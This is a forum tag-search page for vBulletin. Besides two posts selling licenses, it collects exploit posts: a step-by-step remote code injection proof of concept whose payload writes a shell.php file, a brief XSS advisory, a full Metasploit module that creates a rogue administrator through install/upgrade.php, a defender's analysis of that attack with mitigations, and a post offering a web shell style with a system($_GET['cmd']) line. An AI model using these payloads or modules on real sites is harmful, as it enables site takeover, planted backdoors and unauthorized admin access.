Search the Community
Showing results for tags 'vbulletin'.
-
(stiai ca... RST ruleaza pe platforma vBulletin?) (stiai ca... o licenta vBulletin 4.2 in momentul de fata costa 237 eur?) De vanzare: - licenta vBulletin 4.x - are download si vBulletin 3.x - Forum Runner mobile app - pretul cu care a fost cumparata la vremea respectiva (in 2011): 210 EUR - pret vanzare: 21 eur (paypal / btc)
-
################################################################################################################# [+] Exploit Title: vBulletin 4.x.x 'visitormessage.php' Remote Code Injection Vulnerability [+] Discovered By: Dariush Nasirpour (Net.Edit0r) [+] My Homepage: black-hg.org / nasirpour.info [+] Date: [2015 27 February] [+] Vendor Homepage: vBulletin.com [+] Tested on: [vBulletin 4.2.2] [+] Greeting : Ali Razmjoo - Ehsan Nezami - Arash Shams - Ramin Shahkar and all my freinds ( #bhg ) ################################################################################################################# Remote Code Injection: +++++++++++++++++++++++++ 1) You Must Register In The vBulletin http://www.victim.com/register.php example:[blackhat] 2) go to your user profile example: [http://black-hg.org/cc/members/blackhat.html] 3) post something in visitor message and record post data with live http header [example] : message_backup=&message=For-Test-Sample&wysiwyg=1&sbutton=%D8%A7%D8%B1%D8%B3%D8%A7%D9%84+%D9%BE%DB%8C%D8%BA%D8%A7%D9%85&fromquickcomment=1&s=&securitytoken=1425024074-5bcfb5b83d466416ed95e80021abee86063cdf6e&do=message&u=110&u2=&loggedinuser=110&parseurl=1&lastcomment=1425022046&allow_ajax_qc=1&fromconverse= 4- change message to anything "For-Test-Sample" => "ALEEEEEEEEX" [because vBulletin don't let you send same comment in a time] [Now post this with hackbar:] URL: http://black-hg.org/cc/visitormessage.php?do=message [Post data] message_backup=&message=ALEEEEEEEEX&wysiwyg=1&sbutton=%D8%A7%D8%B1%D8%B3%D8%A7%D9%84+%D9%BE%DB%8C%D8%BA%D8%A7%D9%85&fromquickcomment=1&s=&securitytoken=1425024074-5bcfb5b83d466416ed95e80021abee86063cdf6e&do=message&u=110&u2=&loggedinuser=110&parseurl=1&lastcomment=1425022046&allow_ajax_qc=1&fromconverse= [And referrer data:] PoC : http://black-hg.org/cc/members/blackhat.html?a=$stylevar[${${file_put_contents("shell.php","hacked[u can upload shell]")}}]" 5- Open hackbar and tamper it with taper data: referrer data has been URL encoded by browser , you have to replace this again with tamper data: http://black-hg.org/cc/members/blackhat.html?a=$stylevar[${${file_put_contents("shell.php","hacked[you can upload shell]")}}]" and submit request. ################################################################################################################ Source
-
Vand licenta vBulletin 4.x Forum + Forum Runner Mobile App - 65 eur sau 0.3 BTC. Pm pentru detalii.
-
*CVE-2014-9469 vBulletin XSS (Cross-Site Scripting) Security Vulnerabilities* Exploit Title: vBulletin XSS (Cross-Site Scripting) Security Vulnerabilities Product: vBulletin Forum Vendor: vBulletin Vulnerable Versions: 5.1.3 5.0.5 4.2.2 3.8.7 3.6.7 3.6.0 3.5.4 Tested Version: 5.1.3 4.2.2 Advisory Publication: Feb 12, 2015 Latest Update: Feb 12, 2015 Vulnerability Type: Cross-Site Scripting [CWE-79] CVE Reference: CVE-2014-9469 CVSS Severity (version 2.0): CVSS v2 Base Score: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:P/A:N) (legend) Impact Subscore: 2.9 Exploitability Subscore: 8.6 Credit: Wang Jing [Mathematics, Nanyang Technological University, Singapore] *Advisory Details:* *(1) Vendor & Product Description:* *Vendor:* vBulletin *Product & Version: * vBulletin Forum 5.1.3 5.0.5 4.2.2 3.8.7 3.6.7 3.6.0 3.5.4 *Vendor URL & Download: * vBulletin can be downloaded from here, https://www.vbulletin.com/purchases/ *Product Introduction:* "vBulletin (vB) is a proprietary Internet forum software package developed by vBulletin Solutions, Inc., a division of Internet Brands. It is written in PHP and uses a MySQL database server." "Since the initial release of the vBulletin forum product in 2000, there have been many changes and improvements. Below is a list of the major revisions and some of the changes they introduced. The current production version is 3.8.7, 4.2.2, and 5.1.3." *(2) Vulnerability Details:* vBulletin has a security problem. It can be exploited by XSS attacks. *(2.1) *The vulnerability occurs at "forum/help" page. Add "hash symbol" first. Then add script at the end of it. *References:* http://tetraph.com/security/cves/cve-2014-9469-vbulletin-xss-cross-site-scripting-security-vulnerabilities/ http://securityrelated.blogspot.com/2015/02/cve-2014-9469-vbulletin-xss-cross-site.html https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9469 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9469 https://security-tracker.debian.org/tracker/CVE-2014-9469 http://www.cvedetails.com/cve/CVE-2014-9469/ http://www.security-database.com/detail.php?alert=CVE-2014-9469 http://packetstormsecurity.com/files/cve/CVE-2014-9469 http://www.pentest.it/cve-2014-9469.html http://www.naked-security.com/cve/CVE-2014-9469/ http://www.inzeed.com/kaleidoscope/cves/cve-2014-9469/ http://007software.net/cve-2014-9469/ http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/cve-2014-9469/ https://computertechhut.wordpress.com/2015/02/12/cve-2014-9469/ https://security-tracker.debian.org/tracker/CVE-2014-9469 -- Wang Jing, Division of Mathematical Sciences (MAS), School of Physical and Mathematical Sciences (SPMS), Nanyang Technological University (NTU), Singapore. http://www.tetraph.com/wangjing/ https://twitter.com/justqdjing Source
-
This module abuses the "install/upgrade.php" component on vBulletin 4.1+ and 4.5+ to create a new administrator account, as exploited in the wild on October 2013. This module has been tested successfully on vBulletin 4.1.5 and 4.1.0. Module Name auxiliary/admin/http/vbulletin_upgrade_admin Authors Unknown juan vazquez <juan.vazquez [at] metasploit.com> References URL: https://rstforums.com/forum/76476-dangerous-vbulletin-exploit-wild.rst URL: Dangerous vBulletin exploit in the wild URL: Potential vBulletin Exploit (vBulletin 4.1+, vBulletin 5+) - vBulletin Community Forum Module Options To display the available options, load the module within the Metasploit console and run the commands 'show options' or 'show advanced': msf > use auxiliary/admin/http/vbulletin_upgrade_admin msf auxiliary(vbulletin_upgrade_admin) > show actions ...actions... msf auxiliary(vbulletin_upgrade_admin) > set ACTION <action-name> msf auxiliary(vbulletin_upgrade_admin) > show options ...show and set options... msf auxiliary(vbulletin_upgrade_admin) > run Development Source Code ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report def initialize(info = {}) super(update_info(info, 'Name' => 'vBulletin Administrator Account Creation', 'Description' => %q{ This module abuses the "install/upgrade.php" component on vBulletin 4.1+ and 4.5+ to create a new administrator account, as exploited in the wild on October 2013. This module has been tested successfully on vBulletin 4.1.5 and 4.1.0. }, 'Author' => [ 'Unknown', # Vulnerability discoverer? found in the wild 'juan vazquez' #metasploit module ], 'License' => MSF_LICENSE, 'References' => [ [ 'URL', 'http://www.net-security.org/secworld.php?id=15743' ], [ 'URL', 'http://www.vbulletin.com/forum/forum/vbulletin-announcements/vbulletin-announcements_aa/3991423-potential-vbulletin-exploit-vbulletin-4-1-vbulletin-5'] ], 'DisclosureDate' => 'Oct 09 2013')) register_options( [ OptString.new('TARGETURI', [ true, "The vbulletin URI", '/']), OptString.new('USERNAME', [true, 'The username for the new admin account', 'msf']), OptString.new('PASSWORD', [true, 'The password for the new admin account', 'password']), OptString.new('EMAIL', [true, 'The email for the new admin account', 'msf@email.loc']) ], self.class) end def user datastore["USERNAME"] end def pass datastore["PASSWORD"] end def run if user == pass print_error("#{peer} - Please select a password different than the username") return end print_status("#{peer} - Trying a new admin vBulletin account...") res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, "install", "upgrade.php"), 'method' =>'POST', 'vars_post' => { "version" => "install", "response" => "true", "checktable" => "false", "firstrun" => "false", "step" => "7", "startat" => "0", "only" => "false", "options[skiptemplatemerge]" => "0", "reponse" => "yes", "htmlsubmit" => "1", "htmldata[username]" => user, "htmldata[password]" => pass, "htmldata[confirmpassword]" => pass, "htmldata[email]" => datastore["EMAIL"] }, 'headers' => { "X-Requested-With" => "XMLHttpRequest" } }) if res and res.code == 200 and res.body =~ /Administrator account created/ print_good("#{peer} - Admin account with credentials #{user}:#{pass} successfully created") report_auth_info( :host => rhost, :port => rport, :sname => 'http', :user => user, :pass => pass, :active => true, :proof => res.body ) else print_error("#{peer} - Admin account creation failed") end end end History vBulletin Administrator Account Creation | Rapid7
- 1 reply
-
- administrator
- creation
-
(and 3 more)
Tagged with:
-
vBulletin is a popular proprietary CMS that was recently reported to be vulnerable to an unspecified attack vector. vBulletin is currently positioned 4th in the list of installed CMS sites on the Internet. Hence, the threat potential is huge. Although vBulletin has not disclosed the root cause of the vulnerability or its impact, we determined the attacker’s methods. The identified vulnerability allows an attacker to abuse the vBulletin configuration mechanism in order to create a secondary administrative account. Once the attacker creates the account, they will have full control over the exploited vBulletin application, and subsequently the supported site. Initial analysis Although vBulletin has not disclosed the root cause of the vulnerability or the impact on customers, they did provide a workaround in a blog post encouraging customers to delete the /install, /core/install in vBulleting 4.x and 5.x respectively. Additionally, on vBulletin internal forums a victimized user shared his server’s Apache log, providing some visibility into the attacker’s procedure: This log indicates that the attacker continuously scans, using “GET” requests, for the “/install/upgrade.php” vulnerable resource. Once successful , indicated by the “200”response code, as opposed to “404” response code for non-existing resources, the attacker issues a “POST” request to the same resource with the attack payload. Since the Apache logger does not log the parameters of POST requests, the details of the attack are not yet revealed. Once we had access to some concrete technical details on the vulnerability, we were able to effectively scan hacker forums in search of an exploit code. Soon after, we found PHP code that implements the attack. Next, we carefully installed the code in our lab. The interface clearly states the goal of the attack: injecting a new admin. In order to exploit the vulnerability and inject a new Admin user, the attacker needs to provide the following details: The vulnerable vBulletin upgrade.php exact URL The customer ID. To get these details, the attackers created an additional auxiliary PHP script. The script scans a site for the vulnerable path, exactly as shown above in the reported Apache log, and extracts the customer ID from the vulnerable upgrade.php page, as it’s embedded within the page’s source code. Consequently, the attacker now knows both the vBulletin’s upgarde.php vulnerable URL and the customer ID. With this information, the attack can be launched. Here is an example of the POST request with the attack payload (the red fields match to the information the attacker needed to enter in the PHP interface above). The result of the attack was exactly what the exploit package described. A new admin user was created (“eviladmin”) that is under the control of the attacker. The site has been successfully compromised. Recommendations: vBulletin has advised its customers to delete /install and /core/install directories in versions 4.x and 5.x respectively. For vBulletin users not able to delete these directories – it is advised to block access or redirect requests that hit upgrade.php through via either a WAF, or via web server access configuration. Source: Dangerous vBulletin exploit in the wild
-
By TinKode Why I created this (XML) Shell for vBulletin?! Hmm, because it's more easy to use and work on all versions from 3.X to 4.X. I removed all PHP codes, because vB 4.X had restricted these tags. The old method to edit a file like ajax.php to make RCE [Remote Command Execution] and to add a code in source like <?php system($_GET['cmd']);?> and to execute like http://website.com/ajax.php?cmd=[RCE] Now doesn't work on the 4.X versions! Instructions: Step 1: Enter on AdminCP -> Styles & Templates section and choose Download / Upload Styles. Step 2: Click on Browse button and search insecurity.xml, and after select [Yes] Ignore Style Version, then click Import. Step 3: After you have uploaded the .XML Style, you can access by clicking on the style like in the example. IMGS Downloads: Mirror: http://pastebin.com/ybZqXiDH Mirror: http://www.megaupload.com/?d=5DELFLQ3 Password: ISR